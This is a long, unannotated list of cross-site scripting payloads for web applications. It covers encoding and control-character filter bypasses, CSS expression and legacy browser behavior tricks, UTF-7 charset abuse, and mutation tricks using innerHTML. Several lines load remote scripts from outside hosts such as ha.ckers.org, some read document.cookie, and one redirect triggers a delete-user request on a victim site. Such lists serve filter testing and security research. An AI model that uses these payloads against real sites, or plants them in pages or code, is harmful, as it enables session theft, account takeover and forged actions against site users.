<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE2\x80\x84javascript:javascript:alert(1)"
id="fuzzelement1">test</a>

<a href="\xE2\x80\x86javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\xE3\x80\x80javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE2\x80\xA8javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE2\x80\xA9javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\xE2\x80\x85javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>

`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>

`"'><img src=xxx:x \x22onerror=javascript:alert(1)>

`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>

`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>

`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>

`"'><img src=xxx:x \x09onerror=javascript:alert(1)>

`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>

`"'><img src=xxx:x \x00onerror=javascript:alert(1)>

`"'><img src=xxx:x \x27onerror=javascript:alert(1)>

`"'><img src=xxx:x \x20onerror=javascript:alert(1)>

"`'><script>\x3Bjavascript:alert(1)</script>

"`'><script>\x0Djavascript:alert(1)</script>

"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>

"`'><script>\xE2\x80\x81javascript:alert(1)</script>

"`'><script>\xE2\x80\x84javascript:alert(1)</script>

"`'><script>\xE3\x80\x80javascript:alert(1)</script>

"`'><script>\x09javascript:alert(1)</script>

"`'><script>\xE2\x80\x89javascript:alert(1)</script>

"`'><script>\xE2\x80\x85javascript:alert(1)</script>

"`'><script>\xE2\x80\x88javascript:alert(1)</script>

"`'><script>\x00javascript:alert(1)</script>

"`'><script>\xE2\x80\xA8javascript:alert(1)</script>

"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>

"`'><script>\xE1\x9A\x80javascript:alert(1)</script>

"`'><script>\x0Cjavascript:alert(1)</script>

"`'><script>\x2Bjavascript:alert(1)</script>

"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>

"`'><script>-javascript:alert(1)</script>

"`'><script>\x0Ajavascript:alert(1)</script>

"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>

"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>

"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>

"`'><script>\xE2\x80\xA9javascript:alert(1)</script>

"`'><script>\xC2\x85javascript:alert(1)</script>

"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>

"`'><script>\xE2\x80\x83javascript:alert(1)</script>

"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>

"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>

"`'><script>\xE2\x80\x80javascript:alert(1)</script>

"`'><script>\x21javascript:alert(1)</script>

"`'><script>\xE2\x80\x82javascript:alert(1)</script>

"`'><script>\xE2\x80\x86javascript:alert(1)</script>

"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>

"`'><script>\x0Bjavascript:alert(1)</script>

"`'><script>\x20javascript:alert(1)</script>

"`'><script>\xC2\xA0javascript:alert(1)</script>

"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />

"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />

"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />

"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />

"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />

"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />

"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />

"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />

"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />

<script\x2F>javascript:alert(1)</script>

<script\x20>javascript:alert(1)</script>

<script\x0D>javascript:alert(1)</script>

<script\x0A>javascript:alert(1)</script>

<script\x0C>javascript:alert(1)</script>
<script\x00>javascript:alert(1)</script>

<script\x09>javascript:alert(1)</script>

`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>

`"'><img src=xxx:x onerror\x00=javascript:alert(1)>

`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>

`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>

`"'><img src=xxx:x onerror\x20=javascript:alert(1)>

`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>

`"'><img src=xxx:x onerror\x09=javascript:alert(1)>

<script>javascript:alert(1)<\x00/script>

<img src=# onerror\x3D"javascript:alert(1)" >

<input onfocus=javascript:alert(1) autofocus>

<input onblur=javascript:alert(1) autofocus><input autofocus>

<video poster=javascript:javascript:alert(1)//

<body

onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br>

<br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<b

r><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br

><br><br>...<br><br><br><br><input autofocus>

<form id=test onforminput=javascript:alert(1)><input></form><button

form=test onformchange=javascript:alert(1)>X

<video><source onerror="javascript:javascript:alert(1)">

<video onerror="javascript:javascript:alert(1)"><source>

<form><button formaction="javascript:javascript:alert(1)">X

<body oninput=javascript:alert(1)><input autofocus>

<math href="javascript:javascript:alert(1)">CLICKME</math> <math>

<maction actiontype="statusline#http://google.com"

xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>

<frameset onload=javascript:alert(1)>

<table background="javascript:javascript:alert(1)">
<img src=x onerror=javascript:alert(1)//">

<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">

<![><img src="]><img src=x onerror=javascript:alert(1)//">

<style><img src="</style><img src=x onerror=javascript:alert(1)//">

<li style=list-style:url() onerror=javascript:alert(1)> <div

style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden

onload=javascript:alert(1)></div>

<head><base href="javascript://"></head><body><a

href="/. /,javascript:alert(1)//#">XXX</a></body>

<SCRIPT FOR=document

EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>

<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM

NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>

<object data="data:text/html;base64,%(base64)s">

<embed src="data:text/html;base64,%(base64)s">

<b <script>alert(1)</script>0

<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div>

<div id="div2"></div><script>document.getElementById("div2").innerHTML =

document.getElementById("div1").innerHTML;</script>

<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>

<embed src="javascript:alert(1)">

<img src="javascript:alert(1)">

<image src="javascript:alert(1)">

<script src="javascript:alert(1)">

<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x

<? foo="><script>javascript:alert(1)</script>">

<! foo="><script>javascript:alert(1)</script>">

</ foo="><script>javascript:alert(1)</script>">

<? foo="><x foo='?><script>javascript:alert(1)</script>'>">

<! foo="[[[Inception]]"><x
foo="]foo><script>javascript:alert(1)</script>">

<% foo><x foo="%><script>javascript:alert(1)</script>">

<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div>

<script>d.innerHTML=d.innerHTML</script>

<img \x00src=x onerror="alert(1)">

<img \x47src=x onerror="javascript:alert(1)">

<img \x11src=x onerror="javascript:alert(1)">

<img \x12src=x onerror="javascript:alert(1)">

<img\x47src=x onerror="javascript:alert(1)">

<img\x10src=x onerror="javascript:alert(1)">

<img\x13src=x onerror="javascript:alert(1)">

<img\x32src=x onerror="javascript:alert(1)">

<img\x47src=x onerror="javascript:alert(1)">

<img\x11src=x onerror="javascript:alert(1)">

<img \x47src=x onerror="javascript:alert(1)">

<img \x34src=x onerror="javascript:alert(1)">

<img \x39src=x onerror="javascript:alert(1)">

<img \x00src=x onerror="javascript:alert(1)">

<img src\x09=x onerror="javascript:alert(1)">

<img src\x10=x onerror="javascript:alert(1)">

<img src\x13=x onerror="javascript:alert(1)">

<img src\x32=x onerror="javascript:alert(1)">

<img src\x12=x onerror="javascript:alert(1)">

<img src\x11=x onerror="javascript:alert(1)">

<img src\x00=x onerror="javascript:alert(1)">

<img src\x47=x onerror="javascript:alert(1)">

<img src=x\x09onerror="javascript:alert(1)">

<img src=x\x10onerror="javascript:alert(1)">

<img src=x\x11onerror="javascript:alert(1)">

<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">

<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">

<img src=x onerror=\x09"javascript:alert(1)">

<img src=x onerror=\x10"javascript:alert(1)">

<img src=x onerror=\x11"javascript:alert(1)">

<img src=x onerror=\x12"javascript:alert(1)">

<img src=x onerror=\x32"javascript:alert(1)">

<img src=x onerror=\x00"javascript:alert(1)">

<a

href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX<

/a>

<img src="x` `<script>javascript:alert(1)</script>"` `>

<img src onerror /" '"= alt=javascript:alert(1)//">

<title onpropertychange=javascript:alert(1)></title><title title=>

<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x

onerror=javascript:alert(1)></a>">

<script src="/\%(jscript)s"></script>

<script src="\\%(jscript)s"></script>

<object id="x"

classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object

classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"

onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param

name=postdomevents /></object>

<a style="-o-link:'javascript:javascript:alert(1)';-o-link-

source:current">X

<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-

link-source:current}]{color:red};</style>

<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d

<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>

<a style="pointer-events:none;position:absolute;"><a

style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a

href="javascript:javascript:alert(1)">XXX</a>

<style>*[{}@import'%(css)s?]</style>X

<div style="font-family:'foo
;color:red;';">XXX

<div style="font-family:foo}color=red;">XXX

<// style=x:expression\28javascript:alert(1)\29>

<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}</style>

<div style=content:url(%(svg)s)></div>

<div style="list-style:url(http://foo.f)\

20url(javascript:javascript:alert(1));">X

<div id=d><div style="font-family:'sans\27\3B

color\3Ared\3B'">X</div></div>

<script>with(document.getElementById("d"))innerHTML=innerHTML</script>

<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X

<div

style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/

foo.jpg);">X

<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;}

#y];color:red;{} </style>

<x style="background:url('x;color:red;/*')">XXX</x>

<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</

script>

<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>

<script>ReferenceError.prototype.__defineGetter__('name', function()

{javascript:alert(1)}),x</script>

<script>Object.__noSuchMethod__ = Function,[{}]

[0].constructor._('javascript:alert(1)')()</script>

<meta charset="x-imap4-modified-
utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8Acg

A9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi

<meta charset="x-imap4-modified-

utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>

<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾

X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >

1<set/xmlns=`urn:schemas-microsoft-com:time`

style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml`

to=`<img/src="x"onerror=javascript:alert(1)>`>

1<animate/xmlns=urn:schemas-microsoft-com:time

style=behavior:url(#default#time2) attributename=innerhtml

values=<img/src="."onerror=javascript:alert(1)>>

<vmlframe xmlns=urn:schemas-microsoft-com:vml

style=behavior:url(#default#vml);position:absolute;width:100%;height:100

% src=%(vml)s#xss></vmlframe>

1<a href=#><line xmlns=urn:schemas-microsoft-com:vml

style=behavior:url(#default#vml);position:absolute

href=javascript:javascript:alert(1) strokecolor=white

strokeweight=1000px from=0 to=1000 /></a>

<a style="behavior:url(#default#AnchorClick);"

folder="javascript:javascript:alert(1)">XXX</a>

<x style="behavior:url(%(sct)s)">

<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html"

datasrc="#xss" datafld="payload"></label>

<event-source src="%(event)s" onload="javascript:alert(1)">

<a href="javascript:javascript:alert(1)"><event-source

src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">

<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t"

implementation="#default#time2"> <t:set attributeName="innerHTML"

targetElement="x"
to="<imgsrc=x:xonerror=javascript:alert(1)>">

<script>%(payload)s</script>

<script src=%(jscript)s></script>

<script language='javascript' src='%(jscript)s'></script>

<script>javascript:alert(1)</script>

<IMG SRC="javascript:javascript:alert(1);">

<IMG SRC=javascript:javascript:alert(1)>

<IMG SRC=`javascript:javascript:alert(1)`>

<SCRIPT SRC=%(jscript)s?<B>

<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>

<BODY ONLOAD=javascript:alert(1)>

<BODY ONLOAD=javascript:javascript:alert(1)>

<IMG SRC="jav ascript:javascript:alert(1);">

<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>

<SCRIPT/SRC="%(jscript)s"></SCRIPT>

<<SCRIPT>%(payload)s//<</SCRIPT>

<IMG SRC="javascript:javascript:alert(1)"

<iframe src=%(scriptlet)s <

<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">

<IMG DYNSRC="javascript:javascript:alert(1)">

<IMG LOWSRC="javascript:javascript:alert(1)">

<BGSOUND SRC="javascript:javascript:alert(1);">

<BR SIZE="&{javascript:alert(1)}">

<LAYER SRC="%(scriptlet)s"></LAYER>

<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">

<STYLE>@import'%(css)s';</STYLE>

<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">

<XSS STYLE="behavior: url(%(htc)s);">

<STYLE>li {list-style-image:

url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh"

CONTENT="0;url=javascript:javascript:alert(1);">

<META HTTP-EQUIV="refresh" CONTENT="0;

URL=http://;URL=javascript:javascript:alert(1);">

<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>

<TABLE BACKGROUND="javascript:javascript:alert(1)">

<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">

<DIV STYLE="background-image: url(javascript:javascript:alert(1))">

<DIV STYLE="width:expression(javascript:alert(1));">

<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">

<XSS STYLE="xss:expression(javascript:alert(1))">

<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>

<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</

STYLE><A CLASS=XSS></A>

<STYLE

type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</

STYLE>

<BASE HREF="javascript:javascript:alert(1);//">

<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param

name=url value=javascript:javascript:alert(1)></OBJECT>

<HTML xmlns:xss><?import namespace="xss" implementation="%

(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML

ID="xss"><I><B><IMG SRC="javas<!-- --

>cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss"

DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-

com:time"><?import namespace="t" implementation="#default#time2"><t:set

attributeName="innerHTML" to="XSS<SCRIPT
DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>

<SCRIPT SRC="%(jpg)s"></SCRIPT>

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-

7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-

<form id="test" /><button form="test"

formaction="javascript:javascript:alert(1)">X

<body

onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br

><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br

><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<P STYLE="behavior:url('#default#time2')" end="0"

onEnd="javascript:alert(1)">

<STYLE>@import'%(css)s';</STYLE>

<STYLE>a{background:url('s1' 's2)}@import

javascript:javascript:alert(1);');}</STYLE>

<meta charset= "x-imap4-modified-

utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>

<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>

<style onreadystatechange=javascript:javascript:alert(1);></style>

<?xml version="1.0"?><html:html

xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(

1);</html:script></html:html>

<embed code=%(scriptlet)s></embed>

<embed code=javascript:javascript:alert(1);></embed>

<embed src=%(jscript)s></embed>

<frameset onload=javascript:javascript:alert(1)></frameset>

<object onerror=javascript:javascript:alert(1)>

<embed type="image" src=%(scriptlet)s></embed>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<!

[CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>

<a href="jav&#65ascript:javascript:alert(1)">test1</a>

<a href="jav&#97ascript:javascript:alert(1)">test1</a>

<embed width=500 height=500

code="data:text/html,<script>%(payload)s</script>"></embed>

<iframe

srcdoc="&LT;iframe/srcdoc=&lt;img/src=&apos;&apos;on

error=javascript:alert(1)&gt;>">

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,8

3,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,

83))//--

></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<a onmouseover="alert(document.cookie)">xxs link</a>

<a onmouseover=alert(document.cookie)>xxs link</a>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=# onmouseover="alert('xxs')">

<IMG SRC= onmouseover="alert('xxs')">

<IMG onmouseover="alert('xxs')">

<IMG

SRC=javascript:a&

#108;ert('XSS')>
<IMG

SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#000

0105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#000

0116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG

SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x

65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav	ascript:alert('XSS');">

<IMG SRC="jav
ascript:alert('XSS');">

<IMG SRC="javascript:alert('XSS');">

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

<IMG SRC="  javascript:alert('XSS');">

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

<SCRIPT SRC=//ha.ckers.org/.j>

<IMG SRC="javascript:alert('XSS')"

<iframe src=http://ha.ckers.org/scriptlet.html <

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<STYLE>li {list-style-image:

url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">

<BODY ONLOAD=alert('XSS')>

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>;

REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</

STYLE>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

exp/*<A

STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A

CLASS=XSS></A>

<STYLE

type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<STYLE

type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="xss:expression(alert('XSS'))">

<XSS STYLE="behavior: url(xss.htc);">

¼script¾alert(¢XSS¢)¼/script¾

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html

base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0;

URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\

0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\

0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<BASE HREF="javascript:alert('XSS');//">

<OBJECT TYPE="text/x-scriptlet"

DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH

A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv

MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs

aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw

IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh

TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"

AllowScriptAccess="always"></EMBED>

<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

<!--#exec cmd="/bin/echo 'IPT

SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?

somevariables=maliciouscode">

Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

<META HTTP-EQUIV="Set-Cookie"

Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-

7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT

SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<A HREF="http://66.102.7.147/">XSS</A>

<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>

<A HREF="http://1113982867/">XSS</A>

<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>

<A HREF="http://0102.0146.0007.00000223/">XSS</A>

<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>

<iframe src="&Tab;javascript:prompt(1)&Tab;">

<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

<input/onmouseover="javaSCRIPT&colon;confirm(1)"

<sVg><scRipt >alert(1) {Opera}

<img/src=`` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=``&NewLine; onerror=alert(1)&NewLine;

<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js'

/&Tab;></script>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<iframe/src="data:text/

html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

<script //>//alert(1)//</script //

"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">

<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-

equiv="refresh"/>

<svg><script

xlink:href=data&colon;,window.open('https://www.google.com/')></script

<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

<iframe src=javascript&colon;alert(document&period;location)>

<form><a href="javascript:\u0061lert(1)">X

</script><img/*/src="worksinchrome&colon;prompt(1)"/*/

onerror='eval(src)'>

<img/	
 src=`~` onerror=prompt(1)>

<form><iframe 	


src="javascript:alert(1)"
	;>

<a href="data:application/x-x509-user-

cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	


>X</a

http://www.google<script .com>alert(document.location)</script

<a href=[]"

onmouseover=prompt(1)//">XYZ</a

<img/src=@  onerror = prompt('1')

<style/onload=prompt('XSS')

<script ^^>alert(String.fromCharCode(49))</script ^^

</style  ><script   :-(>//alert(document.location)//</script

  :-(

</form><input type="date" onfocus="alert(1)">

<form><textarea  onkeyup='\u0061\u006C\u0065\u0072\

u0074(1)'>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\

u1450')/***/</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>

<a href="javascript:void(0)"

onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

<script ~>alert(0%0)</script ~>

<style/onload=<!--	>
alert
(1)>

<///style///><span %2F onmousemove='alert(1)'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

"><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox &

Opera}

<marquee onstart='javascript:alert(1)'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

<iframe// src=javaSCRIPT&colon;alert(1)

//<form/

action=javascript:alert(document&period;cookie)><input/

type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1)

/*iframe/src*/>

